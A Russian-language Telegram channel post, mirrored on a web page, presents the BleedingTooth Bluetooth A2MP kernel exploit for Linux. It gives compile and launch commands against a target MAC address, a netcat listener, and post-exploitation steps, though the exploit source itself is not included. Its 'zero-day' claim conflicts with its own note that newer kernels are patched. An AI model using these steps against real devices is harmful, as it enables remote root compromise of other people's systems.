MANUAL_PENTESTING Telegram 1322
Forwarded from Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.

BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)

Компиляция:
 $ gcc -o exploit BleedingTooth.c -lbluetooth


Запуск:
 $ sudo ./exploit MAC-адрес атакуемого устройства


В другом терминале выполнить:
 $ nc -lvp 1337



При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator


Успешность: ~80% для целевой версии ядра.

Ограничения:
Bluetooth должен быть активен и доступен для подключения.
SELinux/AppArmor могут блокировать выполнение кода.
Современные ядра (после 5.15) не уязвимы.

Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10



tgoop.com/manual_pentesting/1322
Create:
Last Update:

Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.

BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)

Компиляция:

 $ gcc -o exploit BleedingTooth.c -lbluetooth


Запуск:
 $ sudo ./exploit MAC-адрес атакуемого устройства


В другом терминале выполнить:
 $ nc -lvp 1337



При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator


Успешность: ~80% для целевой версии ядра.

Ограничения:
Bluetooth должен быть активен и доступен для подключения.
SELinux/AppArmor могут блокировать выполнение кода.
Современные ядра (после 5.15) не уязвимы.

Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux

BY Security


Share with your friend now:
tgoop.com/manual_pentesting/1322

View MORE
Open in Telegram


Telegram News

Date: |

Telegram offers a powerful toolset that allows businesses to create and manage channels, groups, and bots to broadcast messages, engage in conversations, and offer reliable customer support via bots. How to create a business channel on Telegram? (Tutorial) How to Create a Private or Public Channel on Telegram? ZDNET RECOMMENDS Invite up to 200 users from your contacts to join your channel
from us


Telegram Security
FROM American